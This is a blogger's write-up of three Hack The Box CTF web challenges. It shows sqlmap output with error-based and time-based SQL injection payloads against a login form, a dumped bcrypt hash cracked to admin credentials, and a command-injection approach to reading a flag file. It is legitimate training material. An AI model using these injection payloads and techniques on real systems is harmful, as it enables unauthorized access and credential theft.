Hellow hackers hope you guys are doing well, had a chance to participate into HTB latest CTF,learned a lot with this CTF especially most web challenges,lemme share with you how i managed to solve few web challenges other of categories I managed to solve can be found on the other blog post which can be found here writteup

This was a 3-4 days heavy CTF challenge, lets check how i managed to solve few web challenge

WEB CHALLENGES

Flag Command

description

solution

First thing start an instance and copy the ip and port number to your browser, as usually the first thing we need to understand how the site works

Went direct to my burp suite and see how i can exploit this, after spending some a while with this trying to exploit on the browser, but realized that approach was an insane one, decide to use a simple with the burp suite.

N/B: from the history on burp we can see an API that was interesting one lets foward it to the repeter very fast.

and i saw this strange word "secret", so i decide to capture a request while typing the command "HEAD NORTH"

lets modify it with the secret command we saw earlier, it will look like this.

And there we got the flag.

HTB{D3v3l0p3r_t00l5_4r3_b35t_wh4t_y0u_Th1nk??!}

KORP Terminal

Description

Solution

As usually were a given a docker instance here, spawn it and see what we have on the ip and port number.

Got a login page, the first think i thought was to bypass the login page with the SQL injection via the username field and password field. Mhmmmmmmmm

While Testing the login pagee with SQL injection i observed unusual behavior in the username field, There are some payload showed me that the username is 'admin' the only field were missing is the password field(How do we get into that???).

The other error was this one, which showed me that the login page is vulnerable to SQL injection.

N/B: After much time testing on how to bypass this i realized that also SQL injection can be used for other issues, like extracting the database and so oninstead of continue spending time much other time bypassing this one.

I decided to automate this with sqlmap so i saved the request into a file and started testing into my terminal.

┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF]
└─$ sqlmap -r b.req --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.2#stable}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:16:07 /2024-03-12/

[01:16:07] [INFO] parsing HTTP request from 'b.req'
[01:16:07] [INFO] testing connection to the target URL
[01:16:09] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401). If this is intended, try to rerun by providing a valid value for option '--ignore-code'
[01:16:09] [WARNING] HTTP error codes detected during run:
401 (Unauthorized) - 1 times

[*] ending @ 01:16:09 /2024-03-12/

Lets read the error well what is concerned, if we read this line carefully it says that invalid creds(that is true) and at the end it says we can ignore this with a "–ignore-code"

Decided to add this option at the End of my first command

Now it started working LOL,i waited sqlmap to finish this task

Parameter: username (POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: username=admin' AND EXTRACTVALUE(9701,CONCAT(0x5c,0x7170787071,(SELECT (ELT(9701=9701,1))),0x717a716a71)) AND 'XIUM'='XIUM&password=admin

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 2204 FROM (SELECT(SLEEP(5)))IEup) AND 'gIjy'='gIjy&password=admin
---
[01:21:21] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1 (MariaDB fork)
[01:21:22] [INFO] fetching database names
[01:21:23] [INFO] retrieved: 'information_schema'
[01:21:23] [INFO] retrieved: 'korp_terminal'
[01:21:23] [INFO] retrieved: 'test'
available databases [3]:
[*] information_schema
[*] korp_terminal
[*] test

decided to take dump the korp_terminal database

And we can see a browfish encypted password

$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.

lets crack it with hashcat, I cracked it when i was solving the challenge

Now we got the credentials we can try to login in

username: admin 
password:password123

FLAG:HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}

TimeKORP

Description

Solution

Download the files and at the same time start an docker instance so as we can interact with a challenge.

Its a time machine,took me a while understand how to exploit it, I decided to go and read the source code again and found this code

I reviewed the source and realized that the date command allow us to execute command, so we can try to break the retriction of executing our command also by command injection

Now lets find the flag as we have successful exploit the vulnerability

N/B: findind the flag was also another challenge here, i spent like 20-30 minutes finding it, so i decided to check a docker file and see if i can get it, course withine a docker image u will see what command are allowed and what have been disallowed, lets see

┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/dd/web_timekorp]
└─$ cat Dockerfile                    
FROM debian:buster-slim

# Setup user
RUN useradd www

# Install system packeges
RUN apt-get update && apt-get install -y supervisor nginx lsb-release wget

# Add repos
RUN wget -O /etc/apt/trusted.gpg.d/php.gpg https://packages.sury.org/php/apt.gpg
RUN echo "deb https://packages.sury.org/php/ $(lsb_release -sc) main" | tee /etc/apt/sources.list.d/php.list

# Install PHP dependencies
RUN apt update && apt install -y php7.4-fpm

# Configure php-fpm and nginx
COPY config/fpm.conf /etc/php/7.4/fpm/php-fpm.conf
COPY config/supervisord.conf /etc/supervisord.conf
COPY config/nginx.conf /etc/nginx/nginx.conf

# Copy challenge files
COPY challenge /www

# Setup permissions
RUN chown -R www:www /www /var/lib/nginx

# Copy flag
COPY flag /flag

# Expose the port nginx is listening on
EXPOSE 80

# Populate database and start supervisord
CMD /usr/bin/supervisord -c /etc/supervisord.conf 

At the bottom we can see that the flag was copied to a root directory so we can get the flag from root directory like this

HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}